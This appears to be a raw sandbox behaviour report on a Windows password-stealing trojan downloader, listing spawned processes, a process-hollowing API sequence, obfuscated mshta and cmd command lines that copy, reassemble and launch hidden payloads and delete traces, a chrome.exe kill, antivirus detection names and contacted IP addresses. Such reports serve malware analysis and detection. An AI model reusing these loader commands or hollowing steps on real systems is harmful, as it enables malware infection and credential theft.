creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000638
1 1 0

CreateProcessInternalW

 thread_identifier: 2232
thread_handle: 0x000006f4
process_identifier: 1908
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000700
1 1 0

CreateProcessInternalW

 thread_identifier: 2448
thread_handle: 0x000006f4
process_identifier: 2080
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000070c
1 1 0

CreateProcessInternalW

 thread_identifier: 596
thread_handle: 0x00000718
process_identifier: 2744
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000724
1 1 0

CreateProcessInternalW

 thread_identifier: 2840
thread_handle: 0x00000724
process_identifier: 1808
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000734
1 1 0

CreateProcessInternalW

 thread_identifier: 1828
thread_handle: 0x0000072c
process_identifier: 668
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe" /mixtwo
filepath_r: C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000073c
1 1 0

CreateProcessInternalW

 thread_identifier: 2720
thread_handle: 0x00000724
process_identifier: 2344
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe" silent
filepath_r: C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000740
1 1 0

CreateProcessInternalW

 thread_identifier: 1884
thread_handle: 0x000006f4
process_identifier: 1204
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000071c
1 1 0

CreateProcessInternalW

 thread_identifier: 3476
thread_handle: 0x00000560
process_identifier: 3472
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000006a0
1 1 0

CreateProcessInternalW

 thread_identifier: 3152
thread_handle: 0x00000548
process_identifier: 3124
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000690
1 1 0

NtResumeThread

 thread_handle: 0x000006dc
suspend_count: 1
process_identifier: 1892
1 0 0

NtResumeThread

 thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 2080
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 2080
1 0 0

NtResumeThread

 thread_handle: 0x0000000000000174
suspend_count: 1
process_identifier: 2080
1 0 0

CreateProcessInternalW

 thread_identifier: 668
thread_handle: 0x00000084
process_identifier: 656
current_directory:
filepath: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000088
1 1 0

NtGetContextThread

 thread_handle: 0x00000084
1 0 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 4096
process_identifier: 656
process_handle: 0x00000088
1 0 0

NtAllocateVirtualMemory

 process_identifier: 656
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000088
1 0 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 656
process_handle: 0x00000088
1 1 0

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4199584
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000084
process_identifier: 656
1 0 0

NtResumeThread

 thread_handle: 0x00000084
suspend_count: 1
process_identifier: 656
1 0 0

NtResumeThread

 thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 2744
1 0 0

CreateProcessInternalW

 thread_identifier: 2552
thread_handle: 0x00000274
process_identifier: 2112
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Windows\System32\mshta.exe
track: 1
command_line: "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
filepath_r: C:\Windows\System32\mshta.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000027c
1 1 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2112
1 0 0

CreateProcessInternalW

 thread_identifier: 2612
thread_handle: 0x000000c4
process_identifier: 3016
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002b8
1 1 0

NtResumeThread

 thread_handle: 0x000000c4
suspend_count: 1
process_identifier: 2112
1 0 0

CreateProcessInternalW

 thread_identifier: 2356
thread_handle: 0x00000088
process_identifier: 1032
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE
track: 1
command_line: ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
filepath_r: C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1032
1 0 0

CreateProcessInternalW

 thread_identifier: 1232
thread_handle: 0x00000090
process_identifier: 1040
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Windows\System32\taskkill.exe
track: 1
command_line: taskkill /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
filepath_r: C:\Windows\system32\taskkill.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

 thread_handle: 0x00000184
suspend_count: 1
process_identifier: 1032
1 0 0

CreateProcessInternalW

 thread_identifier: 1468
thread_handle: 0x00000284
process_identifier: 2212
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\mshta.exe
track: 1
command_line: "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
filepath_r: C:\Windows\System32\mshta.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000027c
1 1 0

CreateProcessInternalW

 thread_identifier: 1444
thread_handle: 0x00000194
process_identifier: 2324
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\mshta.exe
track: 1
command_line: "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
filepath_r: C:\Windows\System32\mshta.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000284
1 1 0

NtResumeThread

 thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2212
1 0 0

CreateProcessInternalW

 thread_identifier: 288
thread_handle: 0x000000c4
process_identifier: 1408
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002b8
1 1 0

NtResumeThread

 thread_handle: 0x00000304
suspend_count: 1
process_identifier: 2212
1 0 0

NtResumeThread

 thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2324
1 0 0

CreateProcessInternalW

 thread_identifier: 2632
thread_handle: 0x00000308
process_identifier: 2532
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000310
1 1 0

NtResumeThread

 thread_handle: 0x00000328
suspend_count: 1
process_identifier: 2324
1 0 0

NtResumeThread

 thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 2344
1 0 0

CreateProcessInternalW

 thread_identifier: 3660
thread_handle: 0x000004c0
process_identifier: 3656
current_directory:
filepath:
track: 1
command_line: cmd.exe /c taskkill /f /im chrome.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000004c4
1 1 0

CreateProcessInternalW

 thread_identifier: 3100
thread_handle: 0x000004d8
process_identifier: 3104
current_directory:
filepath:
track: 1
command_line: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2728
thread_handle: 0x0000008c
process_identifier: 1332
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" EChO "
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2228
thread_handle: 0x00000088
process_identifier: 2804
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 916
thread_handle: 0x0000008c
process_identifier: 2432
current_directory:
filepath: C:\Windows\System32\control.exe
track: 1
command_line: control.exe ..\QVNGP.I
filepath_r: C:\Windows\system32\control.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

NtResumeThread

 thread_handle: 0x0000008c
suspend_count: 0
process_identifier: 2432
1 0 0
Lionic Trojan.Win32.Disbuk.i!c
Elastic malicious (high confidence)
DrWeb Trojan.PWS.Stealer.31121
MicroWorld-eScan Trojan.GenericKD.37711236
FireEye Generic.mg.477b1b2a2779f1a1
ALYac Trojan.GenericKD.37711236
Cylance Unsafe
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005820621 )
Alibaba TrojanPSW:Win32/Disbuk.b3eb2291
K7GW Trojan-Downloader ( 005820621 )
BitDefenderTheta Gen:NN.ZexaF.34170.yuW@ae8rCcpi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.FWC
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win32.Disbuk.gen
BitDefender Trojan.GenericKD.37711236
Avast Win32:Trojan-gen
Tencent Win32.Trojan-downloader.Agent.Pdct
Ad-Aware Trojan.GenericKD.37711236
Emsisoft Trojan.GenericKD.37711236 (B)
McAfee-GW-Edition GenericRXMT-VE!477B1B2A2779
Sophos Mal/Generic-S
Ikarus Trojan-Downloader.Win32.Agent
Webroot W32.Malware.Gen
Avira TR/Dldr.Agent.njxyo
Gridinsoft Malware.Win32.GenericMC.cc
Microsoft Trojan:Script/Phonzy.A!ml
ViRobot Trojan.Win32.Z.Agent.394240.MC
GData Trojan.GenericKD.37711236
AhnLab-V3 Malware/Win.VE.C4670703
McAfee GenericRXMT-VE!477B1B2A2779
MAX malware (ai score=82)
VBA32 BScope.TrojanRansom.FileCryptor
Malwarebytes Spyware.PasswordStealer
TrendMicro-HouseCall TROJ_GEN.R002H0CJ321
Rising Downloader.Agent!1.D93C (CLASSIC)
SentinelOne Static AI - Malicious PE
eGambit Unsafe.AI_Score_68%
Fortinet W32/Agent.FWC!tr
AVG Win32:Trojan-gen
Panda Trj/Downloader.AAE
CrowdStrike win/malicious_confidence_60% (D)
dead_host 2.56.59.42:80
dead_host 192.168.56.101:49340
dead_host 192.168.56.101:49248
dead_host 192.168.56.101:49311